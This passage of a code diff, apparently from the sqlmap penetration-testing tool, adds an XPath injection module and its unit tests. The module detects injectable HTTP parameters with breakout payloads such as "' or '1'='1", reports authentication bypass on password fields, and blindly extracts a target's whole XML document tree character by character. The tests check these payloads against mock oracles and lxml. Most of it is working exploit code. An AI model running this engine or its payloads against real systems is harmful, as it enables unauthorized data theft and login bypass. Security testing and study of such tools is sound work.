XPATH_CHAR_MAX and _ not in _META_ORDS and _ not in _CHARSET: + _CHARSET.append(_) +for _ in xrange(XPATH_CHAR_MIN, XPATH_CHAR_MAX + 1): + if _ not in _META_ORDS and _ not in _CHARSET: + _CHARSET.append(_) + + +def _inferValue(oracle, builder, path, getter, maxLen=XPATH_MAX_LENGTH): + """Blindly infer a string value at `path` using `getter(builder, path, prefix)`. + Returns the recovered value or None.""" + + value = "" + probes = 0 + + for _ in xrange(maxLen): + found = False + + for cp in _CHARSET: + candidate = value + chr(cp) + probes += 1 + + if oracle.extract(getter(builder, path, candidate)): + value = candidate + found = True + break + + if not found: + break + + if value.endswith(" "): + value = value.rstrip() + break + + logger.debug("XPath blind inference: %d probes (length=%d)" % (probes, len(value))) + return value if value else None + + +def _inferCount(oracle, builder, path, countFn, maxCount=128): + """Binary search for a count value using predicate 'count(...)>=N'.""" + + if not oracle.extract(countFn(builder, path, 1)): + return 0 + + lo, hi = 1, maxCount + while lo < hi: + mid = (lo + hi + 1) // 2 + if oracle.extract(countFn(builder, path, mid)): + lo = mid + else: + hi = mid - 1 + return lo + + +def _walkTree(oracle, builder, path="/*", depth=0): + """Recursively walk the XML tree from a given XPath expression. + Returns a dict: {name, path, children, attributes, text} or None.""" + + if depth > XPATH_MAX_DEPTH: + return None + + name = _inferValue(oracle, builder, path, + lambda b, p, prefix: b.nameStartsWith(p, prefix)) + if not name: + return None + + logger.info("discovered element: '%s'" % name) + + childCount = _inferCount(oracle, builder, path, + lambda b, p, c: b.childCount(p, c), + maxCount=32) + + attrCount = _inferCount(oracle, builder, path, + lambda b, p, c: b.attributeCount(p, c), + maxCount=16) + + attributes = [] + for i in xrange(1, attrCount + 1): + attrName = _inferValue(oracle, builder, path, + lambda b, p, prefix, idx=i: b.attributeNameStartsWith(p, idx, prefix)) + if not attrName: + continue + + attrValue = _inferValue(oracle, builder, path, + lambda b, p, prefix, idx=i: b.attributeValueStartsWith(p, idx, prefix)) + attributes.append({"name": attrName, "value": attrValue or ""}) + logger.info(" attribute: @%s='%s'" % (attrName, attrValue or "")) + + text = None + if childCount == 0: + text = _inferValue(oracle, builder, path, + lambda b, p, prefix: b.textStartsWith(p, prefix)) + + children = [] + for i in xrange(1, childCount + 1): + childPath = "%s/*[%d]" % (path, i) + child = _walkTree(oracle, builder, childPath, depth + 1) + if child: + children.append(child) + + return { + "name": name, + "path": path, + "children": children, + "attributes": attributes, + "text": text, + } + + +def _treeToTable(node): + """Flatten a tree node to (columns, rows) for grid output.""" + + columns = ["Path", "Element", "Attribute", "Value"] + rows = [] + + def _flatten(n, depth=0): + path = n["path"] + rows.append([path, n["name"], "", ""]) + for attr in n.get("attributes", []): + rows.append([path, n["name"], "@" + attr["name"], attr["value"]]) + if n.get("text"): + rows.append([path, n["name"], "text()", n["text"]]) + for child in n.get("children", []): + _flatten(child, depth + 1) + + _flatten(node) + return columns, [_ for _ in rows if _[3] or _[2] not in ("", "text()")] + + +def _grid(columns, rows): + columns = [getUnicode(_) for _ in columns] + rows = [[getUnicode(_) for _ in row] for row in rows] + + widths = [] + for index, column in enumerate(columns): + width = len(column) + for row in rows: + if index < len(row): + width = max(width, len(getUnicode(row[index]))) + widths.append(width) + + separator = "+-" + "-+-".join("-" * _ for _ in widths) + "-+" + + def line(cells): + return "| " + " | ".join((getUnicode(cells[index]) if index < len(cells) else "").ljust(widths[index]) for index in xrange(len(columns))) + " |" + + return "\n".join([separator, line(columns), separator] + [line(row) for row in rows] + [separator]) + + +def _dumpTable(title, columns, rows): + if rows: + conf.dumper.singleString("%s:\n%s" % (title, _grid(columns, rows))) + + +def xpathScan(): + global SENTINEL + SENTINEL = randomStr(length=10, lowercase=True) + + infoMsg = "'--xpath' is self-contained: it detects XPath injection in HTTP " + infoMsg += "parameters and walks the reachable XML document tree. SQL enumeration " + infoMsg += "switches (--banner, --dbs, --tables, --users, --sql-query) are ignored" + logger.info(infoMsg) + + if not conf.paramDict: + logger.error("no request parameters to test (use --data, GET params, or similar)") + return + + tested = found = 0 + slots = [] + + for place in (_ for _ in XPATH_PLACES if _ in conf.paramDict): + for parameter in list(conf.paramDict[place].keys()): + if conf.testParameter and parameter not in conf.testParameter: + continue + + tested += 1 + logger.info("testing XPath injection on %s parameter '%s'" % (place, parameter)) + + # Phase 1: Probe the XPath parser for a backend hint + backendHint, _errorPayload = _probeBackendByParserError(place, parameter) + if backendHint: + backendHint = _fingerprintByError(backendHint) + + # Phase 2: Establish a boolean oracle (authoritative) + template, payload, boundary = _detectBoolean(place, parameter) + if template: + if boundary and boundary.extractable: + found += 1 + backend = backendHint or "Generic XPath" + logger.info("%s parameter '%s' is vulnerable to XPath injection (back-end: '%s')" % (place, parameter, backend)) + if conf.beep: + beep() + + oracle = _makeOracle(place, parameter, template) + slots.append(Slot(place=place, parameter=parameter, backend=backend, + oracle=oracle, template=template, payload=payload, + boundary=boundary)) + continue + + # Detection-only: boolean differentiation confirmed but no extraction boundary. + # Report as auth bypass on credential fields; log generically otherwise. + found += 1 + if _isPasswordParam(parameter): + title = "XPath auth bypass" + logger.info("%s parameter '%s' allows XPath auth bypass (boolean differentiation confirmed)" % (place, parameter)) + else: + title = "XPath boolean-based blind (detection-only)" + logger.info("%s parameter '%s' is vulnerable to XPath injection (detection-only, back-end: '%s')" % (place, parameter, backendHint or "Generic XPath")) + if conf.beep: + beep() + conf.dumper.singleString("---\nParameter: %s (%s)\n Type: XPath injection\n Title: %s\n Payload: %s=%s\n---" % (parameter, place, title, parameter, payload)) + continue + + if backendHint: + logger.info("%s parameter '%s' reaches an XPath parser (back-end: '%s'), but no exploitable boolean oracle was established" % (place, parameter, backendHint)) + + if not slots: + if found: + logger.info("XPath injection confirmed (detection-only, no extractable boundary established)") + logger.info("XPath scan complete") + return + if tested: + warnMsg = "no parameter appears to be injectable via XPath injection (%d tested)" % tested + else: + warnMsg = "no parameters found to test for XPath injection" + logger.warning(warnMsg) + return + + # Select the first oracle-bearing slot with an extractable boundary for tree-walking + slot = next((_ for _ in slots if _.oracle and _.boundary and _.boundary.extractable), None) + if not slot: + logger.info("XPath scan complete") + return + + original = _originalValue(slot.place, slot.parameter) or "x" + # OR-style boundaries always-true if the original branch matches, so use a + # sentinel that is guaranteed not to appear as a field value. AND-style + # boundaries need the original branch to match; keep the original there. + if " or " in slot.boundary.prefix: + base = SENTINEL + else: + base = original + builder = _XPathPayloadBuilder(base, slot.boundary) + oracle = slot.oracle + + # Refine backend fingerprint if generic + if not slot.backend or slot.backend == "Generic XPath": + backend = _backendFromError(oracle.template) + if backend: + backend = _fingerprintByError(backend) + if backend: + logger.info("identified back-end: '%s'" % backend) + slot = slot._replace(backend=backend) + + title = "XPath boolean-based blind" + conf.dumper.singleString("---\nParameter: %s (%s)\n Type: XPath injection\n Title: %s\n Payload: %s=%s\n---" % (slot.parameter, slot.place, title, slot.parameter, slot.payload)) + + # Blind XML tree-walking (attempted document-root traversal) + logger.info("walking XML document tree (depth limit: %d)" % XPATH_MAX_DEPTH) + root = _walkTree(oracle, builder) + + if root: + columns, rows = _treeToTable(root) + logger.info("extracted %d node(s) from XML tree" % (len(rows))) + _dumpTable("XPath: %s parameter '%s' XML tree" % (slot.place, slot.parameter), columns, rows) + else: + warnMsg = "XPath injection is confirmed but the XML tree could not be walked. " + warnMsg += "This may indicate a restricted XPath context (subtree, scalar, or predicate-only)" + logger.warning(warnMsg) + + logger.info("XPath scan complete") diff --git a/tests/test_xpath.py b/tests/test_xpath.py new file mode 100644 index 000000000..9da940016 --- /dev/null +++ b/tests/test_xpath.py @@ -0,0 +1,407 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission + +Offline, deterministic tests for the XPath injection engine. Mock oracles stand in for the +HTTP/lxml layer so detection, fingerprinting, blind inference, payload building, and output +formatting can be exercised without a live target. +""" + +import unittest + +from _testutils import bootstrap +bootstrap() + +import lib.techniques.xpath.inject as xpath + + +SENTINEL = xpath.SENTINEL + + +class TestHelpers(unittest.TestCase): + def test_ratio(self): + self.assertGreater(xpath._ratio("abc", "abc"), 0.9) + self.assertLess(xpath._ratio("abc", "xyz"), 0.5) + + def test_delim(self): + from lib.core.enums import PLACE + self.assertEqual(xpath._delim(PLACE.GET), '&') + self.assertEqual(xpath._delim(PLACE.COOKIE), ';') + + def test_is_error(self): + self.assertTrue(xpath._isError("javax.xml.xpath.XPathExpressionException: error")) + self.assertTrue(xpath._isError("lxml.etree.XPathEvalError: Invalid expression")) + self.assertFalse(xpath._isError("normal page content")) + + def test_backend_from_error(self): + self.assertIsNotNone(xpath._backendFromError("lxml.etree.XPathEvalError: Invalid expression")) + self.assertIsNotNone(xpath._backendFromError("System.Xml.XPath.XPathException: has an invalid token")) + self.assertIsNone(xpath._backendFromError("normal page")) + + def test_is_password_param(self): + self.assertTrue(xpath._isPasswordParam("password")) + self.assertTrue(xpath._isPasswordParam("pass")) + self.assertFalse(xpath._isPasswordParam("username")) + + def test_xpath_quote(self): + self.assertEqual(xpath._xpathQuote("hello"), "'hello'") + self.assertEqual(xpath._xpathQuote("it's"), "\"it's\"") + self.assertEqual(xpath._xpathQuote('say "hi"'), "'say \"hi\"'") + both = "it's \"great\"" + q = xpath._xpathQuote(both) + self.assertIn("concat", q) + + def test_make_payload_with_suffix(self): + b = xpath.Boundary("') or ", " or ('", True) + p = xpath._makePayload("x", b, "starts-with(name(/*),'d')") + self.assertEqual(p, "x') or starts-with(name(/*),'d') or ('") + + def test_make_payload_no_suffix(self): + b = xpath.Boundary("' or ", "", True) + p = xpath._makePayload("x", b, "1=1") + self.assertEqual(p, "x' or 1=1") + + def test_make_payload_with_suffix_only(self): + b = xpath.Boundary("' or ", " and '1'='1", True) + p = xpath._makePayload("x", b, "1=1") + self.assertEqual(p, "x' or 1=1 and '1'='1") + + +class TestBoundaryTable(unittest.TestCase): + def test_all_entries_in_boundary_lookup(self): + for bk in xpath.XPATH_BREAKOUT_PREFIXES: + self.assertIn(bk, xpath._BREAKOUT_BOUNDARY, + "Breakout '%s' not found in _BREAKOUT_BOUNDARY" % bk) + + def test_function_arg_boundaries_are_extractable(self): + for bk in ("') or true() or ('", "') or '1'='1' or ('", "') or 1=1 or ('"): + b = xpath._BREAKOUT_BOUNDARY[bk] + self.assertTrue(b.extractable) + self.assertTrue(len(b.prefix) > 0) + self.assertTrue(len(b.suffix) > 0) + + def test_simple_string_boundaries_have_suffix(self): + for bk in ("' or '1'='1", "' or true() or '", "' or 1=1 or '", + '" or "1"="1', '" or true() or "'): + b = xpath._BREAKOUT_BOUNDARY[bk] + if b is not None: + self.assertTrue(b.extractable) + self.assertTrue(len(b.suffix) > 0, + "Simple string breakout '%s' needs a suffix to absorb the trailing quote" % bk) + + def test_union_wildcard_is_not_extractable(self): + b = xpath._BREAKOUT_BOUNDARY.get("']|//*|test['") + self.assertIsNone(b, "Union wildcard must not have an extraction boundary") + + def test_numeric_has_leading_space(self): + for bk in (" or 1=1", " or true()"): + self.assertTrue(bk.startswith(" "), + "Numeric breakout '%s' needs leading whitespace" % bk) + b = xpath._BREAKOUT_BOUNDARY[bk] + self.assertTrue(b.extractable) + + def test_all_extractable_have_prefix(self): + for bk, b in xpath._BREAKOUT_BOUNDARY.items(): + if b is not None: + self.assertTrue(len(b.prefix) > 0, + "Extractable boundary for '%s' needs a prefix" % bk) + + +class TestPayloadBuilder(unittest.TestCase): + def setUp(self): + self.boundary = xpath._BREAKOUT_BOUNDARY["') or true() or ('"] + self.builder = xpath._XPathPayloadBuilder("x", self.boundary) + + def test_name_starts_with(self): + p = self.builder.nameStartsWith("/*", "d") + self.assertIn("starts-with(name(/*)", p) + self.assertIn("'d'", p) + + def test_name_length(self): + p = self.builder.nameLength("/*", 9) + self.assertIn("string-length(name(/*))=9", p) + + def test_child_count(self): + p = self.builder.childCount("/*", 3) + self.assertIn("count(/*/*)>=3", p) + + def test_attribute_count(self): + p = self.builder.attributeCount("/*[1]", 2) + self.assertIn("count(/*[1]/@*)>=2", p) + + def test_text_starts_with(self): + p = self.builder.textStartsWith("/*[1]/*[1]", "lut") + self.assertIn("starts-with(string(/*[1]/*[1])", p) + + def test_empty_prefix(self): + p = self.builder.nameStartsWith("/*", "") + self.assertIn("''", p) + + def test_uses_boundary_not_hardcoded(self): + p = self.builder.nameStartsWith("/*", "d") + self.assertNotIn("contains(username", p) + self.assertIn("x') or ", p) + self.assertIn(" or ('", p) + + def test_simple_string_boundary_builder(self): + b = xpath._BREAKOUT_BOUNDARY["' or '1'='1"] + builder = xpath._XPathPayloadBuilder("x", b) + p = builder.nameStartsWith("/*", "d") + self.assertIn("x' or ", p) + self.assertIn(" and '1'='1", p) + + +class TestBooleanDetection(unittest.TestCase): + def setUp(self): + self.original_send = xpath._send + + def tearDown(self): + xpath._send = self.original_send + + def test_false_page_must_be_reproducible(self): + # True is stable, false changes every time -> no oracle + true_calls = [0] + + def mock(place, parameter, value): + if "true()" in value: + return "true-page" + elif "false()" in value: + true_calls[0] += 1 + return "false-page-%d" % true_calls[0] + return "default" + + xpath._send = mock + template, payload, boundary = xpath._detectBoolean("GET", "q") + self.assertIsNone(template) + + def test_detection_returns_extractable_boundary(self): + def mock(place, parameter, value): + if "true()" in value: + return '{"count":7,"entries":[{...}]}' + elif "false()" in value: + return '{"count":0,"entries":[],"error":null}' + return "default" + + xpath._send = mock + template, payload, boundary = xpath._detectBoolean("GET", "q") + self.assertIsNotNone(template) + self.assertIsNotNone(boundary) + self.assertTrue(boundary.extractable) + + +class TestGridAndTable(unittest.TestCase): + def test_grid(self): + columns = ["Path", "Element", "Value"] + rows = [["/*", "root", ""], ["/*[1]", "child", "text"]] + grid = xpath._grid(columns, rows) + self.assertIn("Path", grid) + self.assertIn("root", grid) + + def test_grid_empty(self): + grid = xpath._grid([], []) + self.assertIn("+", grid) + + def test_tree_to_table(self): + node = { + "name": "directory", "path": "/*", + "children": [{"name": "user", "path": "/*[1]", "children": [], + "attributes": [{"name": "id", "value": "1"}], "text": None}], + "attributes": [], "text": None, + } + columns, rows = xpath._treeToTable(node) + self.assertIn("Path", columns) + self.assertGreater(len(rows), 0) + + +class TestExtraction(unittest.TestCase): + def test_infer_value_mock(self): + expected = "directory" + boundary = xpath._BREAKOUT_BOUNDARY["') or true() or ('"] + builder = xpath._XPathPayloadBuilder("x", boundary) + + class MockOracle(object): + def extract(self, payload): + import re + m = re.search(r"""starts-with\(name\(/\*\),'([^']*)'\)""", payload) + return expected.startswith(m.group(1)) if m else False + + oracle = MockOracle() + result = xpath._inferValue(oracle, builder, "/*", + lambda b, p, prefix: b.nameStartsWith(p, prefix), + maxLen=20) + self.assertEqual(result, expected) + + def test_infer_count(self): + expected = 3 + boundary = xpath._BREAKOUT_BOUNDARY["') or true() or ('"] + builder = xpath._XPathPayloadBuilder("x", boundary) + + class MockOracle(object): + def extract(self, payload): + import re + m = re.search(r"count\(/\*/\*\)>=(\d+)", payload) + if m: + return int(m.group(1)) <= expected + return False + + oracle = MockOracle() + result = xpath._inferCount(oracle, builder, "/*", + lambda b, p, c: b.childCount(p, c), + maxCount=8) + self.assertEqual(result, expected) + + +class TestBackendFingerprint(unittest.TestCase): + def test_lxml(self): + page = "lxml.etree.XPathEvalError: Invalid expression" + backend = xpath._backendFromError(page) + self.assertIsNotNone(backend) + self.assertIn("lxml", backend) + + def test_java_jaxp(self): + page = "javax.xml.xpath.XPathExpressionException: A location path was expected" + backend = xpath._backendFromError(page) + self.assertIsNotNone(backend) + + def test_dotnet(self): + page = "System.Xml.XPath.XPathException: Expression must evaluate to a node-set" + backend = xpath._backendFromError(page) + self.assertIsNotNone(backend) + + def test_no_error(self): + page = "Normal page with user data" + backend = xpath._backendFromError(page) + self.assertIsNone(backend) + + +# --- Real XPath syntax validation (lxml) --------------------------------------- + +_XML = b"""lutherfluffy""" + +_XPATH_TEMPLATES = { + "function_arg": "//user[contains(name,'%s')]", + "single_quoted": "//user[name='%s']", + "double_quoted": '//user[name="%s"]', + "numeric": "//user[position()=%s]", + "bare_predicate": "//user[%s]", +} + + +def _xpath_eval(template, payload): + """Evaluate an XPath expression against _XML, return the match count.""" + try: + from lxml import etree + except ImportError: + raise unittest.SkipTest("lxml not available") + root = etree.fromstring(_XML) + expr = template % payload + return len(root.xpath(expr)) + + +class TestRealXPathSyntax(unittest.TestCase): + """Verify that detection payloads and extraction predicates are syntactically + valid XPath and produce the expected boolean results.""" + + @staticmethod + def _count(template, payload): + return _xpath_eval(template, payload) + + def _test_family(self, template_key, true_breakout, false_breakout, boundary_key, original="x"): + template = _XPATH_TEMPLATES[template_key] + boundary = xpath._BREAKOUT_BOUNDARY[boundary_key] + self.assertIsNotNone(boundary) + self.assertTrue(boundary.extractable) + + # Detection payloads must be syntactically valid and yield true/false + truePayload = original + true_breakout + falsePayload = original + false_breakout + self.assertGreater(self._count(template, truePayload), 0, + "True payload '%s' should match at least one node" % truePayload) + self.assertEqual(self._count(template, falsePayload), 0, + "False payload '%s' should match no nodes" % falsePayload) + + # Extraction predicate must be valid and change the result truthfully + builder = xpath._XPathPayloadBuilder(original, boundary) + truePred = xpath._makePayload(original, boundary, "true()") + falsePred = xpath._makePayload(original, boundary, "false()") + self.assertGreater(self._count(template, truePred), 0, + "Extraction true predicate must match") + self.assertEqual(self._count(template, falsePred), 0, + "Extraction false predicate must not match") + + def test_function_arg_family(self): + self._test_family("function_arg", + "') or true() or ('", "') and false() and ('", + "') or true() or ('") + + def test_single_quoted_family(self): + self._test_family("single_quoted", + "' or '1'='1", "' and '1'='2", + "' or '1'='1") + + def test_double_quoted_family(self): + self._test_family("double_quoted", + '" or "1"="1', '" and "1"="2', + '" or "1"="1') + + def test_numeric_family(self): + self._test_family("numeric", + " or 1=1", " and 1=2", + " or 1=1", original="1") + + def test_bare_predicate_family(self): + self._test_family("bare_predicate", + " or true()", " and false()", + " or true()", original="1") + + def test_function_arg_second_variant(self): + self._test_family("function_arg", + "') or '1'='1' or ('", "') and '1'='2' and ('", + "') or '1'='1' or ('") + + def test_single_quoted_with_matching_original(self): + """When the original value matches a record (name='luther'), OR-style + extraction with 'and' suffix is still decisive because the engine uses + a non-matching sentinel base for tree-walking.""" + boundary = xpath._BREAKOUT_BOUNDARY["' or '1'='1"] + # Simulate what xpathScan() does: use a sentinel as base for OR-style + sentinel = "zzznotpresent" + builder = xpath._XPathPayloadBuilder(sentinel, boundary) + truePred = xpath._makePayload(sentinel, boundary, "true()") + falsePred = xpath._makePayload(sentinel, boundary, "false()") + tpl = _XPATH_TEMPLATES["single_quoted"] + self.assertGreater(self._count(tpl, truePred), 0, + "OR extraction must match with sentinel base + true predicate") + self.assertEqual(self._count(tpl, falsePred), 0, + "OR extraction must not match with sentinel base + false predicate") + + def test_all_extractable_boundaries_have_valid_extraction(self): + # Match each boundary to an appropriate template and original value. + _CONTEXT = { + "') or true() or ('": ("function_arg", "x"), + "') or '1'='1' or ('": ("function_arg", "x"), + "') or 1=1 or ('": ("function_arg", "x"), + '") or true() or ("': ("function_arg", "x"), + "' or '1'='1": ("single_quoted", "x"), + "' or true() or '": ("single_quoted", "x"), + "' or 1=1 or '": ("single_quoted", "x"), + "' and '1'='1": ("single_quoted", "x"), + '" or "1"="1': ("double_quoted", "x"), + '" or true() or "': ("double_quoted", "x"), + " or 1=1": ("numeric", "999"), + " or true()": ("bare_predicate", "999"), + } + for bk, boundary in xpath._BREAKOUT_BOUNDARY.items(): + if boundary is None or not boundary.extractable: + continue + tkey, original = _CONTEXT.get(bk, ("function_arg", "x")) + template = _XPATH_TEMPLATES[tkey] + payload = xpath._makePayload(original, boundary, "true()") + try: + count = self._count(template, payload) + except Exception as e: + self.fail("Boundary '%s' in '%s' with orig='%s' invalid: %s\n payload: %s" % (bk, tkey, original, e, payload)) + self.assertIsInstance(count, int, + "Boundary '%s' in '%s' produced no count" % (bk, tkey))